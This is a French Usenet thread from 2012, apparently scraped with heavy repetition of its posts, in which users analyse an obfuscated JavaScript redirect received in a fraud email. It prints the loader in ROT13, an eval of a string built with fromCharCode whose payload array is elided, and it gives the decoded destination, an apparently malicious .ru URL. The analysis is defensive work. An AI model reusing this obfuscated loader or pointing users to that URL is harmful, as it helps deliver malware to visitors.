Comment savoir sans danger ce que fait le script suivant, reçu dans
une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
une façon simple de connaître par exemple l'URL pour envoyer un
avertissement au site sans doute piraté vers lequel mène ce script ?
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>You are redirecting</title>
</head>
<body>
<h1>Loading... Wait please...</h1><br>
</body>`
Cette action est irreversible, confirmez la suppression du commentaire ?
Signaler le commentaire
Veuillez sélectionner un problème
Nudité
Violence
Harcèlement
Fraude
Vente illégale
Discours haineux
Terrorisme
Autre
yamo'
Salut,
Le 22/02/2012 15:57, a écrit:
Comment savoir sans danger ce que fait le script suivant, reçu dans une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il une façon simple de connaître par exemple l'URL pour envoyer un avertissement au site sans doute piraté vers lequel mène ce script ?
J'ai regardé, l'extension faite par le développeur d'Adblock Plus ne peut pas t'aider : <https://addons.mozilla.org/en-US/seamonkey/addon/javascript-deobfuscator/> / <https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/>
Une réponse à cette question est très intéressante!
Peut-être que sur fr.comp.securite tu auras une réponse même si c'est limite hors charte...
-- Stéphane
Salut,
Le 22/02/2012 15:57, nospam@com.invalid a écrit:
Comment savoir sans danger ce que fait le script suivant, reçu dans
une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
une façon simple de connaître par exemple l'URL pour envoyer un
avertissement au site sans doute piraté vers lequel mène ce script ?
J'ai regardé, l'extension faite par le développeur d'Adblock Plus ne
peut pas t'aider :
<https://addons.mozilla.org/en-US/seamonkey/addon/javascript-deobfuscator/>
/ <https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/>
Une réponse à cette question est très intéressante!
Peut-être que sur fr.comp.securite tu auras une réponse même si c'est
limite hors charte...
Comment savoir sans danger ce que fait le script suivant, reçu dans une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il une façon simple de connaître par exemple l'URL pour envoyer un avertissement au site sans doute piraté vers lequel mène ce script ?
J'ai regardé, l'extension faite par le développeur d'Adblock Plus ne peut pas t'aider : <https://addons.mozilla.org/en-US/seamonkey/addon/javascript-deobfuscator/> / <https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/>
Une réponse à cette question est très intéressante!
Peut-être que sur fr.comp.securite tu auras une réponse même si c'est limite hors charte...
-- Stéphane
Pierre Maurette
:
Bonjour,
Comment savoir sans danger ce que fait le script suivant, reçu dans une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il une façon simple de connaître par exemple l'URL pour envoyer un avertissement au site sans doute piraté vers lequel mène ce script ?
<ROT13> vs(jvaqbj['q' + 'b' + 'p' + 'h' + 'z' + 'r' + 'ag']) nn = /j/.rkrp(arj Qngr()).vaqrk + []; nnn = '0'; gel { arj qbphzrag(); } pngpu (ddd) { ff = Fgevat; } vs(nn.vaqrkBs(nnn) !== -1) s = '-30!...!86'.fcyvg('!'); zq = 'n'; r = jvaqbj['r' + 'iny']; j = s; f = ''; se = 's' + 'eb' + 'z' + 'Pune'; e = ff[se + 'Pbqr']; sbe( v = 0; 0 > v - j.yratgu; v++) { w = v; f = f + e(39 + 1 * j[w]); } vs(nn.vaqrkBs(nnn) !== -1) r(f); </ROT13>
Comment savoir sans danger ce que fait le script suivant, reçu dans
une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
une façon simple de connaître par exemple l'URL pour envoyer un
avertissement au site sans doute piraté vers lequel mène ce script ?
<ROT13>
vs(jvaqbj['q' + 'b' + 'p' + 'h' + 'z' + 'r' + 'ag'])
nn = /j/.rkrp(arj Qngr()).vaqrk + [];
nnn = '0';
gel {
arj qbphzrag();
} pngpu (ddd) {
ff = Fgevat;
}
vs(nn.vaqrkBs(nnn) !== -1)
s = '-30!...!86'.fcyvg('!');
zq = 'n';
r = jvaqbj['r' + 'iny'];
j = s;
f = '';
se = 's' + 'eb' + 'z' + 'Pune';
e = ff[se + 'Pbqr'];
sbe( v = 0; 0 > v - j.yratgu; v++) {
w = v;
f = f + e(39 + 1 * j[w]);
}
vs(nn.vaqrkBs(nnn) !== -1)
r(f);
</ROT13>
Comment savoir sans danger ce que fait le script suivant, reçu dans une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il une façon simple de connaître par exemple l'URL pour envoyer un avertissement au site sans doute piraté vers lequel mène ce script ?
<ROT13> vs(jvaqbj['q' + 'b' + 'p' + 'h' + 'z' + 'r' + 'ag']) nn = /j/.rkrp(arj Qngr()).vaqrk + []; nnn = '0'; gel { arj qbphzrag(); } pngpu (ddd) { ff = Fgevat; } vs(nn.vaqrkBs(nnn) !== -1) s = '-30!...!86'.fcyvg('!'); zq = 'n'; r = jvaqbj['r' + 'iny']; j = s; f = ''; se = 's' + 'eb' + 'z' + 'Pune'; e = ff[se + 'Pbqr']; sbe( v = 0; 0 > v - j.yratgu; v++) { w = v; f = f + e(39 + 1 * j[w]); } vs(nn.vaqrkBs(nnn) !== -1) r(f); </ROT13>
Comment savoir sans danger ce que fait le script suivant, reçu dans une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il une façon simple de connaître par exemple l'URL pour envoyer un avertissement au site sans doute piraté vers lequel mène ce script ?
Je vous avais proposé une réponse un peu travaillée, malheureusement /Microsoft Security Essentials/ n'a pas aimé du tout. Je vous ai donc mis du code en ROT13 dans un autre message. Le premier est votre code mis en forme (sans le gros tableau d'entiers séparés par des '!'), le second le code qui sera eval-ué() dans e(s);, donc la chaîne s. Des outils, à cumuler éventuellement selon son niveau de paranoïa: travailler dans un /bac à sable/, utiliser un éditeur de code qui sait formater, utiliser Firebug voire Firebug + le debugger d'Aptana, un peu de jugeote et modifier le code. Ici c'est la dernière ligne qui fait tout, e(s); où e est une fonction et s une chaîne, vous pouvez la remplacer par alert(e); alert(s); Ici ce n'est pas violemment obfusqué. Je ne connais pas Javascript, juste une vague idée de la syntaxe, ni en profondeur les mécanismes sous-jacents, mais je suis loin d'être convaincu que l'URL de la /victime/ apparaisse dans ce message ni dans le code reconstitué. Il faudrait plutôt voir la tripaille entourant le message, entêtes par exemple.
-- Pierre Maurette
nospam@com.invalid :
Bonjour,
Comment savoir sans danger ce que fait le script suivant, reçu dans
une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
une façon simple de connaître par exemple l'URL pour envoyer un
avertissement au site sans doute piraté vers lequel mène ce script ?
Je vous avais proposé une réponse un peu travaillée, malheureusement
/Microsoft Security Essentials/ n'a pas aimé du tout. Je vous ai donc
mis du code en ROT13 dans un autre message. Le premier est votre code
mis en forme (sans le gros tableau d'entiers séparés par des '!'), le
second le code qui sera eval-ué() dans e(s);, donc la chaîne s.
Des outils, à cumuler éventuellement selon son niveau de paranoïa:
travailler dans un /bac à sable/, utiliser un éditeur de code qui sait
formater, utiliser Firebug voire Firebug + le debugger d'Aptana, un peu
de jugeote et modifier le code. Ici c'est la dernière ligne qui fait
tout, e(s); où e est une fonction et s une chaîne, vous pouvez la
remplacer par alert(e); alert(s);
Ici ce n'est pas violemment obfusqué. Je ne connais pas Javascript,
juste une vague idée de la syntaxe, ni en profondeur les mécanismes
sous-jacents, mais je suis loin d'être convaincu que l'URL de la
/victime/ apparaisse dans ce message ni dans le code reconstitué. Il
faudrait plutôt voir la tripaille entourant le message, entêtes par
exemple.
Comment savoir sans danger ce que fait le script suivant, reçu dans une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il une façon simple de connaître par exemple l'URL pour envoyer un avertissement au site sans doute piraté vers lequel mène ce script ?
Je vous avais proposé une réponse un peu travaillée, malheureusement /Microsoft Security Essentials/ n'a pas aimé du tout. Je vous ai donc mis du code en ROT13 dans un autre message. Le premier est votre code mis en forme (sans le gros tableau d'entiers séparés par des '!'), le second le code qui sera eval-ué() dans e(s);, donc la chaîne s. Des outils, à cumuler éventuellement selon son niveau de paranoïa: travailler dans un /bac à sable/, utiliser un éditeur de code qui sait formater, utiliser Firebug voire Firebug + le debugger d'Aptana, un peu de jugeote et modifier le code. Ici c'est la dernière ligne qui fait tout, e(s); où e est une fonction et s une chaîne, vous pouvez la remplacer par alert(e); alert(s); Ici ce n'est pas violemment obfusqué. Je ne connais pas Javascript, juste une vague idée de la syntaxe, ni en profondeur les mécanismes sous-jacents, mais je suis loin d'être convaincu que l'URL de la /victime/ apparaisse dans ce message ni dans le code reconstitué. Il faudrait plutôt voir la tripaille entourant le message, entêtes par exemple.
-- Pierre Maurette
Pierre Maurette
(supersedes )
:
Bonjour,
Comment savoir sans danger ce que fait le script suivant, reçu dans une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il une façon simple de connaître par exemple l'URL pour envoyer un avertissement au site sans doute piraté vers lequel mène ce script ?
Je vous avais proposé une réponse un peu travaillée, malheureusement /Microsoft Security Essentials/ n'a pas aimé du tout. Je vous ai donc mis du code en ROT13 dans un autre message. Le premier est votre code mis en forme (sans le gros tableau d'entiers séparés par des '!'), le second le code qui sera eval-ué() dans e(s);, donc la chaîne s. Des outils, à cumuler éventuellement selon son niveau de paranoïa: travailler dans un /bac à sable/, utiliser un éditeur de code qui sait formater, utiliser Firebug voire Firebug + le debugger d'Aptana, un peu de jugeote et modifier le code. Ici c'est la dernière ligne qui fait tout, e(s); où e est une fonction et s une chaîne, vous pouvez la remplacer par alert(e); alert(s); Ici ce n'est pas violemment obfusqué. Je ne connais pas Javascript, juste une vague idée de la syntaxe, ni en profondeur les mécanismes sous-jacents, mais je suis loin d'être convaincu que l'URL de la /victime/ apparaisse dans ce message ni dans le code reconstitué. Il faudrait plutôt voir la tripaille entourant le message, entêtes par exemple.
-- Pierre Maurette
(supersedes <mn.b9d47dc254972af9.79899@free.fr>)
nospam@com.invalid :
Bonjour,
Comment savoir sans danger ce que fait le script suivant, reçu dans
une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
une façon simple de connaître par exemple l'URL pour envoyer un
avertissement au site sans doute piraté vers lequel mène ce script ?
Je vous avais proposé une réponse un peu travaillée, malheureusement
/Microsoft Security Essentials/ n'a pas aimé du tout. Je vous ai donc
mis du code en ROT13 dans un autre message. Le premier est votre code
mis en forme (sans le gros tableau d'entiers séparés par des '!'), le
second le code qui sera eval-ué() dans e(s);, donc la chaîne s.
Des outils, à cumuler éventuellement selon son niveau de paranoïa:
travailler dans un /bac à sable/, utiliser un éditeur de code qui sait
formater, utiliser Firebug voire Firebug + le debugger d'Aptana, un peu
de jugeote et modifier le code. Ici c'est la dernière ligne qui fait
tout, e(s); où e est une fonction et s une chaîne, vous pouvez la
remplacer par alert(e); alert(s);
Ici ce n'est pas violemment obfusqué. Je ne connais pas Javascript,
juste une vague idée de la syntaxe, ni en profondeur les mécanismes
sous-jacents, mais je suis loin d'être convaincu que l'URL de la
/victime/ apparaisse dans ce message ni dans le code reconstitué. Il
faudrait plutôt voir la tripaille entourant le message, entêtes par
exemple.
Comment savoir sans danger ce que fait le script suivant, reçu dans une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il une façon simple de connaître par exemple l'URL pour envoyer un avertissement au site sans doute piraté vers lequel mène ce script ?
Je vous avais proposé une réponse un peu travaillée, malheureusement /Microsoft Security Essentials/ n'a pas aimé du tout. Je vous ai donc mis du code en ROT13 dans un autre message. Le premier est votre code mis en forme (sans le gros tableau d'entiers séparés par des '!'), le second le code qui sera eval-ué() dans e(s);, donc la chaîne s. Des outils, à cumuler éventuellement selon son niveau de paranoïa: travailler dans un /bac à sable/, utiliser un éditeur de code qui sait formater, utiliser Firebug voire Firebug + le debugger d'Aptana, un peu de jugeote et modifier le code. Ici c'est la dernière ligne qui fait tout, e(s); où e est une fonction et s une chaîne, vous pouvez la remplacer par alert(e); alert(s); Ici ce n'est pas violemment obfusqué. Je ne connais pas Javascript, juste une vague idée de la syntaxe, ni en profondeur les mécanismes sous-jacents, mais je suis loin d'être convaincu que l'URL de la /victime/ apparaisse dans ce message ni dans le code reconstitué. Il faudrait plutôt voir la tripaille entourant le message, entêtes par exemple.
-- Pierre Maurette
nospam
Le Thu, 23 Feb 2012 07:49:18 +0100, Pierre Maurette écrivait dans fr.comp.infosystemes.www.auteurs:
(supersedes )
:
Bonjour,
Comment savoir sans danger ce que fait le script suivant, reçu dans une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il une façon simple de connaître par exemple l'URL pour envoyer un avertissement au site sans doute piraté vers lequel mène ce script ?
Je vous avais proposé une réponse un peu travaillée, malheureusement /Microsoft Security Essentials/ n'a pas aimé du tout. Je vous ai donc mis du code en ROT13 dans un autre message. Le premier est votre code mis en forme (sans le gros tableau d'entiers séparés par des '!'), le second le code qui sera eval-ué() dans e(s);, donc la chaîne s.
L'URL serait http://cpojkjfhotzpod.ru:8080/images/aublbzdni.php et en russe, cela ne veut rien dire selon le traducteur de Google. Par contre, la page existe.
[...]
Ici ce n'est pas violemment obfusqué. Je ne connais pas Javascript, juste une vague idée de la syntaxe, ni en profondeur les mécanismes sous-jacents, mais je suis loin d'être convaincu que l'URL de la /victime/ apparaisse dans ce message ni dans le code reconstitué. Il faudrait plutôt voir la tripaille entourant le message, entêtes par exemple.
Victime d'un pirate qui aurait installé du code dangereux sur ce serveur. Mais c'est peut-être bien le pirate, avec un tel code !
J'ai regardé la page avec un proxy et il y a là aussi du code obscure, du java et sans doute du javascript. Disons que cela ne sent pas bon et qu'il vaut mieux ne pas s'y frotter de trop près !
Le Thu, 23 Feb 2012 07:49:18 +0100, Pierre Maurette
<maurette.pierre@free.fr> écrivait dans
fr.comp.infosystemes.www.auteurs:
(supersedes <mn.b9d47dc254972af9.79899@free.fr>)
nospam@com.invalid :
Bonjour,
Comment savoir sans danger ce que fait le script suivant, reçu dans
une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
une façon simple de connaître par exemple l'URL pour envoyer un
avertissement au site sans doute piraté vers lequel mène ce script ?
Je vous avais proposé une réponse un peu travaillée, malheureusement
/Microsoft Security Essentials/ n'a pas aimé du tout. Je vous ai donc
mis du code en ROT13 dans un autre message. Le premier est votre code
mis en forme (sans le gros tableau d'entiers séparés par des '!'), le
second le code qui sera eval-ué() dans e(s);, donc la chaîne s.
L'URL serait http://cpojkjfhotzpod.ru:8080/images/aublbzdni.php
et en russe, cela ne veut rien dire selon le traducteur de Google.
Par contre, la page existe.
[...]
Ici ce n'est pas violemment obfusqué. Je ne connais pas Javascript,
juste une vague idée de la syntaxe, ni en profondeur les mécanismes
sous-jacents, mais je suis loin d'être convaincu que l'URL de la
/victime/ apparaisse dans ce message ni dans le code reconstitué. Il
faudrait plutôt voir la tripaille entourant le message, entêtes par
exemple.
Victime d'un pirate qui aurait installé du code dangereux sur ce
serveur. Mais c'est peut-être bien le pirate, avec un tel code !
J'ai regardé la page avec un proxy et il y a là aussi du code
obscure, du java et sans doute du javascript. Disons que cela ne sent
pas bon et qu'il vaut mieux ne pas s'y frotter de trop près !
Le Thu, 23 Feb 2012 07:49:18 +0100, Pierre Maurette écrivait dans fr.comp.infosystemes.www.auteurs:
(supersedes )
:
Bonjour,
Comment savoir sans danger ce que fait le script suivant, reçu dans une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il une façon simple de connaître par exemple l'URL pour envoyer un avertissement au site sans doute piraté vers lequel mène ce script ?
Je vous avais proposé une réponse un peu travaillée, malheureusement /Microsoft Security Essentials/ n'a pas aimé du tout. Je vous ai donc mis du code en ROT13 dans un autre message. Le premier est votre code mis en forme (sans le gros tableau d'entiers séparés par des '!'), le second le code qui sera eval-ué() dans e(s);, donc la chaîne s.
L'URL serait http://cpojkjfhotzpod.ru:8080/images/aublbzdni.php et en russe, cela ne veut rien dire selon le traducteur de Google. Par contre, la page existe.
[...]
Ici ce n'est pas violemment obfusqué. Je ne connais pas Javascript, juste une vague idée de la syntaxe, ni en profondeur les mécanismes sous-jacents, mais je suis loin d'être convaincu que l'URL de la /victime/ apparaisse dans ce message ni dans le code reconstitué. Il faudrait plutôt voir la tripaille entourant le message, entêtes par exemple.
Victime d'un pirate qui aurait installé du code dangereux sur ce serveur. Mais c'est peut-être bien le pirate, avec un tel code !
J'ai regardé la page avec un proxy et il y a là aussi du code obscure, du java et sans doute du javascript. Disons que cela ne sent pas bon et qu'il vaut mieux ne pas s'y frotter de trop près !